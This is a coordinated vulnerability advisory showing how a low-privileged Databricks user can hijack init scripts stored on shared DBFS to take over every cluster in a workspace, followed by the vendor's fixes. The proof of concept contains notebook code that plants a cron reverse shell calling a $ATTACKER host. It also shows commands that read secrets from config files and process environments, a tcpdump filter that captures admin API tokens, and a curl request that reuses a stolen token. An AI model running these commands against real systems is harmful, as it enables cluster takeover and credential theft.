Bypassing cluster isolation in Databricks Platform

Title

Bypassing cluster isolation through insecure defaults and shared storage

Product

Databricks Platform

Vulnerable Version

PaaS version as of 2023-01-26

Fixed Version

Current PaaS version

CVE Number

-

Impact

critical

Found

20.01.2023

By

Florian Roth (Atos), Marius Bartholdy (SEC Office Berlin) | SEC Consult Vulnerability Lab

A low-privileged user is able to break the isolation between Databricks compute clusters and take over any cluster in a workspace as long as they are able to run notebooks. Due to an insecure default configuration combined with insufficient access control, it is possible to gain remote code execution on all clusters of a workspace. With such an access, it is possible to leak secrets and to escalate privileges to those of a workspace administrator.

Vendor description

"Databricks Data Science & Engineering (sometimes called simply "Workspace") is an analytics platform based on Apache Spark. It is integrated with Azure to provide one-click setup, streamlined workflows, and an interactive workspace that enables collaboration between data engineers, data scientists, and machine learning engineers."

Source: https://learn.microsoft.com/en-us/azure/databricks/scenarios/what-is-azure-databricks-ws

Business recommendation

The vendor disabled legacy scripts and migrated cluster-scoped scripts from DBFS to WSFS. Affected customers received migration instructions.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

We have also written a blog post in collaboration with Elia Florio, Sr. Director of Detection & Response at Databricks and Florian Roth and Marius Bartholdy, security researchers with SEC Consult. It can be found here:
https://r.sec-consult.com/databr

Furthermore, a proof of concept demo video has been published here (Youtube):
https://r.sec-consult.com/dbyoutube

 

Databricks concepts

Concept 1: Databricks File System (DBFS)

"The Databricks File System (DBFS) is a distributed file system mounted into a  Databricks workspace and available on Databricks clusters. DBFS is an abstraction on top of scalable object storage that maps Unix-like filesystem calls to native cloud storage API calls."

Source: https://docs.databricks.com/dbfs/index.html

Therefore developers can easily handle files as if they were local to a compute cluster although they actually reside in a cloud storage.

The recommended way to interact with the DBFS is from within a notebook by using the Databricks Utilities (dbutils). The following command could be used to list the content of a directory:

display(dbutils.fs.ls("dbfs:/databricks/scripts"))

For further information see: https://learn.microsoft.com/en-us/azure/databricks/dbfs/


Concept 2: Init Scripts

Databricks uses a feature called "init script" to customize compute clusters. They can be used to install dependencies or to configure advanced network settings. These are shell scripts that run during the startup of each cluster.

There are different types of init scripts:

(I) Cluster-scoped init scripts only run on the specified cluster and have to be setup by the cluster owner. Before using a cluster-scoped script it has to be uploaded to the DBFS. In the cluster configuration it is then referenced by its file path, e.g dbfs:/databricks/scripts/init-health-check.sh

(II) Global init scripts run on every cluster and have to be configured by an administrative user. Their storage location is not disclosed.

(III) Legacy global init scripts are theoretically deprecated. However, they are enabled by default, even on newly created workspaces. The main difference to the newer global init scripts is that they are stored on the DBFS in a fixed location at dbfs:/databricks/init.

For further information see: https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts

 

Vulnerability overview/description

1) Bypassing cluster isolation through insecure defaults and shared storage

A low-privileged user is able to break the isolation between Databricks compute clusters and take over any cluster in a workspace as long as they are allowed to run notebooks. Due to an insecure default configuration combined with insufficient access control, it is possible to gain remote code execution on all clusters of a workspace. With such an access, it is possible to leak secrets and to escalate privileges to those of a workspace administrator.


Attack scenario:
The DBFS is accessible by every user in a Databricks workspace. All files stored here are visible to anyone in the workspace. Cluster-scoped and legacy global init scripts are stored here. An authenticated attacker with the lowest possible permissions in a Databricks workspace could run a notebook to:

  1. Find and modify an existing cluster-scoped init script.
  2. Place a new script in the default location for legacy global init scripts.

Both attacks lead to the take over of the compute cluster resources and enable further attacks. Firstly, any secrets stored can be read and, secondly, workspace administrator tokens can be stolen as demonstrated by Joosua Santasalo from Secureworks.

See: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html

Proof of concept

1) Bypassing cluster isolation through insecure defaults and shared storage

a) Preparations

For this POC a new Azure Databricks workspace was created with the "premium" pricing tier. It includes an administrative user (databricks-workspace-admin) as well as a newly added low-privileged user (databricks-user) with the default permissions "Workspace access" and "Databricks SQL access". These are the fewest possible permissions a user can have.

To demonstrate both attack scenarios, three clusters were created:

  1. Cluster on which the databricks-user has permissions to run notebooks ("Can attach to")
  2. Cluster for the databricks-workspace-admin with a cluster-scoped init script already configured.
  3. Cluster for the databricks-workspace-admin with no init script

The databricks-user does not have access to the clusters 2 and 3. They cannot even see them in the portal.

For the cluster 2 (with a pre-configured init script) the following notebook code was used by the databricks-workspace-admin to create an init script which simply writes example output to /tmp/init-health-check-success.txt:

dbutils.fs.mkdirs("dbfs:/databricks/scripts/")
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
echo 'Init health check: successful > /tmp/init-helth-check-success.txt' """, True)
display(dbutils.fs.ls("dbfs:/databricks/scripts/init-health-check.sh"))

After that the script was applied to cluster 2 as a cluster-scoped init script.

To show the impact of this attack in a more tangible way a keyvault-backed secret scope as well as a databricks-backed secret scope were also created. Their secrets were then used in the spark configuration and in the environment variables of cluster 2 and 3.

Spark configuration:
databricks-backed-secret {{secrets/databricks-backed-secret-scope/databricks-backed-secret}}
azure-keyvault-backed-secret {{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret}} 

Environment variables:
databricks_backed_secret_in_environment={{secrets/databricks-backed-secret-scope/databricks-backed-secret-in-environment}}
azure_keyvault_backed_secret_in_environment={{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret-in-environment}}

These serve only as examples. On a real productive compute cluster they could be used to connect to additional cloud storage as described here:
https://learn.microsoft.com/en-us/azure/databricks/external-data/azure-storage#--access-azure-data-lake-storage-gen2-or-blob-storage-using-oauth-20-with-an-azure-service-principal

b) Attack via pre-existing init script

The attacker starts by viewing the content of the DBFS with the following code:

display(dbutils.fs.ls("dbfs:/databricks"))
display(dbutils.fs.ls("dbfs:/databricks/scripts"))

All found .sh files could potentially be cluster-scoped init scripts applied to clusters that the attacker is not aware of. It is not possible to overwrite existing scripts, they can however be renamed or deleted. The cluster configuration is only aware of the script names. Therefore, a newly created script with the same name will be executed. Such a malicious file was created. It includes a reverse shell that will continually attempt to connect to the attacker's server.

# rename file
dbutils.fs.mv("/databricks/scripts/init-health-check.sh",
"/databricks/scripts/init-health-check.sh.old")
#write new file with malicious content
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)

As soon as the init script is triggered again, for example via a cluster restart, a reverse shell connection, with root privileges on the compute cluster, is received:

user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 48518 received!
bash: cannot set terminal process group (21384): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-110521-h6l5h1n2-10-139-64-5:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-110521-h6l5h1n2-10-139-64-5:~# uname -a
uname -a
Linux 0121-110521-h6l5h1n2-10-139-64-5 5.4.0-1090-azure #95~18.04.1-Ubuntu SMP Sun Aug 14 20:09:27 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-110521-h6l5h1n2-10-139-64-5:~#

c) Attack via legacy global init script

The legacy global init script is enabled by default, therefore an attacker could assume it is turned on and place a script in the default location at dbfs:/databricks/init.

dbutils.fs.mkdirs("dbfs:/databricks/init/")
dbutils.fs.put("dbfs:/databricks/init/global-init.sh"""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)

Global init scripts apply to every existing compute cluster. Every cluster will establish a reverse shell now as soon as the script is triggered again. With this attack it is possible to attack compute clusters even if they do not have a cluster-scoped init script set up.

user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 53910 received!
bash: cannot set terminal process group (988): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-111747-cmijb28n-10-139-64-4:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-111747-cmijb28n-10-139-64-4:~# uname -a
uname -a
Linux 0121-111747-cmijb28n-10-139-64-4 5.4.0-1100-azure #106~18.04.1-Ubuntu SMP Mon Dec 12 21:49:35 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-111747-cmijb28n-10-139-64-4:~#

Impact

a) Leaking sensitive information in environment variables and the configuration

Secrets configured in the keyvault-backed secret scope can only be retrieved at runtime by the compute instance itself via a managed identity. Even Databricks workspace administrators cannot read them directly. They are however available to the compute cluster as soon as it is initialized. With remote code execution and root privileges an attacker is able to read the plain text secrets of any cluster.

Spark configuration secrets can be found at /tmp/custom-spark.conf:

root@0121-111747-cmijb28n-10-139-64-4:/tmp# cat custom-spark.conf
cat custom-spark.conf
spark.databricks.unityCatalog.enforce.permissions false
spark.driver.host 10.139.64.6
spark.databricks.secret.envVar.keys.toRedact ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA==
spark.driver.tempDirectory /local_disk0/tmp
spark.databricks.delta.preview.enabled true
spark.databricks.wsfsPublicPreview true
databricks-backed-secret databricks-backed-secret-value <- THIS IS A SECRET
spark.databricks.secret.sparkConf.keys.toRedact ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA==
spark.databricks.mlflow.autologging.enabled true
spark.executor.tempDirectory /local_disk0/tmp
spark.databricks.enablePublicDbfsFuse false
spark.databricks.workspaceUrl adb-8690126810713062.2.azuredatabricks.net
spark.master local[*, 4]
azure-keyvault-backed-secret azure-keyvault-backed-secret-value <- THIS IS A SECRET
spark.databricks.cloudfetch.hasRegionSupport true
spark.databricks.unityCatalog.enabled true
spark.databricks.automl.serviceEnabled true
spark.databricks.cluster.profile singleNode
root@0121-111747-cmijb28n-10-139-64-4:/tmp#

In order to read secrets in the environment variables, an attacker would need to access the environment of the right process. With root privileges, they are able to access all processes' environments by reading the corresponding /proc/<process-id>/environ file. For simplicity however, the right process-id (888) was used in this POC:

root@0121-110521-h6l5h1n2-10-139-64-5:~# cat /proc/888/environ
SHELL=/bin/bash[...]
TERM=xterm-256color
USER=root
SPARK_PUBLIC_DNS=10.139.64.6
azure_keyvault_backed_secret_in_environment=
azure-keyvault-backed-secret-in-envionment-value <- THIS IS A SECRET
SPARK_LOCAL_DIRS=/local_disk0SHLVL=1
MASTER=local[4]
SPARK_HOME=/databricks/spark
SPARK_LOCAL_IP=10.139.64.6
MLFLOW_CONDA_HOME=/databricks/conda
CLASSPATH=/databricks/spark/dbconf/jets3t/:/databricks/spark/dbconf/log4j/driver:/databricks/hive/conf:/databricks/spark/dbconf/hadoop:/databricks/jars/*
SPARK_CONF_DIR=/databricks/spark/conf
SPARK_DIST_CLASSPATH=/databricks/spark/dbconf/log4j/driver:/databricks/jars/*
PYENV_ROOT=/databricks/.pyenv
DATABRICKS_LIBS_NFS_ROOT_PATH=/local_disk0/.ephemeral_nfs
SPARK_ENV_LOADED=1
DATABRICKS_CLUSTER_LIBS_ROOT_DIR=cluster_libraries
PATH=/databricks/.pyenv/bin:/usr/local/nvidia/bin:/databricks/python3/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
DATABRICKS_LIBS_NFS_ROOT_DIR=.ephemeral_nfsSUDO_UID=0
DATABRICKS_CLUSTER_LIBS_PYTHON_ROOT_DIR=python
SPARK_SCALA_VERSION=2.12
MAIL=/var/mail/root
databricks_backed_secret_in_environment=
database-backed-secret-in-environment-value <- THIS IS A SECRET
SCALA_VERSION=2.10PTY_LIB_FOLDER=/usr/lib/libptyOLDPWD=/databricks/chauffeurSPARK_WORKE

b) API Token leak and privilege escalation

Using a vulnerability initially found by Joosua Santasalo from Secureworks it is possible to leak Databricks API tokens of other users, including administrators. The previously proposed hardening technique "Use cluster types that support user isolation wherever possible." does not mitigate the initial vulnerability as all compute cluster types are affected by our new vulnerability.
Source: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html

It is thereby possible to impersonate any user and to gain privileges of a workspace administrator.

Using the previously established reverse-shell it is possible to capture control-plane traffic with the following command. As soon as a task is started with the administrative user, for example running a simple notebook, the token is sent unencrypted and could be leaked.

(Make sure to verify that you are on the correct cluster when reproducing the issue using the global init script attack vector since the user cluster will also be attacked and send a shell too. This confused us more often than we would like to admit.)

root@0121-110521-h6l5h1n2-10-139-64-5:~# /usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
/usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked v1), capture size 262144 bytes
{"apiToken":"dkea****************************a107","procStartTime":53444,"commandOrigin":"PythonDriver","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-admin@redacted.onmicrosoft.com"}
apiToken
{"apiToken":"dkea****************************a107","procStartTime":85732,"commandOrigin":"PythonWorker","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-
. . .

This apiToken could then be used in the Databricks CLI or with the REST API directly. The following example request needed administrative privileges to succeed:

└─$ curl -s  adb-redacted.2.azuredatabricks.net/api/2.0/secrets/scopes/list -H 'Authorization: Bearer dkea****************************a107' | jq
{
  "scopes": [
    {
      "name": "databricks-backed-secret-scope",
      "backend_type": "DATABRICKS"
    },
    {
      "name": "key-vault-backed-secret-scope",
      "backend_type": "AZURE_KEYVAULT",
      "keyvault_metadata": {
        "resource_id": "/subscriptions/714984c7-3ed0-4de2-b23b-9cffd28b74f7/resourceGroups/rg-databricks-proof-of-concept/providers/Microsoft.KeyVault/vaults/redacted-databricks-poc",
        "dns_name": "https://redacted-databricks-poc.vault.azure.net/"
      }
    }
  ]
}

Additional scenarios are possible once RCE is achieved, for example by using the managed identity of the compute clusters to get an access token via the instance metadata service at http://169.254.169.254/metadata/identity/oauth2/token.

Vulnerable / tested versions

The latest Databricks PaaS offering was tested on Azure as well as Amazon Web Services (AWS) with the "Premium" pricing tier as of 2023-01-26.

Vendor contact timeline

2023-01-26 Contacting vendor PGP-encrypted through security@databricks.com
2023-01-26 Vendor acknowledged the email and is reviewing the reports
2023-02-15 Vendor confirms all vulnerabilities and is working on a solution
2023-03-29 Vendor proposes a solution
2023-05-02 Coordinated release of security advisory

Solution

Databricks disabled the creation of new workspaces using the deprecated init script types and added support for initializing scripts in Workspace Files.

The following solution for end users has been provided by the vendor:

Legacy global init scripts:

  • Immediately disable legacy global init scripts (AWS [1] | Azure [2] ) if not actively used: it's a safe, easy, and immediate step to close this potential attack vector.
  • Customers with legacy global init scripts deployed should first migrate legacy scripts to the new global init script type (this notebook [3] can be used to automate the migration work) and, after this migration step, proceed to disable the legacy version as indicated in the previous step.

[1] https://docs.databricks.com/clusters/init-scripts.html#migrate-legacy-scripts
[2] https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts#migrate-legacy-scripts
[3] https://kb.databricks.com/legacy-global-init-script-migration-notebook


Cluster-named init scripts:

  • Cluster-named init scripts are similarly affected by the issue and are also deprecated: customers still using this type of init scripts should disable cluster-named init scripts (AWS | Azure), migrate them to cluster-scoped scripts, and make sure that the scripts are stored in the new workspace files storage location (AWS [4] | Azure [5] | GCP [6]). This notebook [7] can be used to automate the migration work.


Cluster-scoped init scripts:

  • Existing cluster-scoped init scripts stored on DBFS should be migrated to the alternative, safer workspace files location (AWS [4] | Azure [5] | GCP [6] ). Going forward the default location of cluster-scoped init scripts in the product UI will be workspace files.

[4] https://docs.databricks.com/files/workspace.html
[5] https://learn.microsoft.com/en-us/azure/databricks/files/workspace
[6] https://docs.gcp.databricks.com/files/workspace.html
[7] https://kb.databricks.com/cluster-named-init-script-migration-notebook


Legacy global init scripts and cluster-named init scripts will be disabled for all workspaces on Sept 1, 2023. They will not function after this date.

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Florian Roth, Marius Bartholdy / @2023

 

Interested to work with the experts of SEC Consult? Send us your application

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices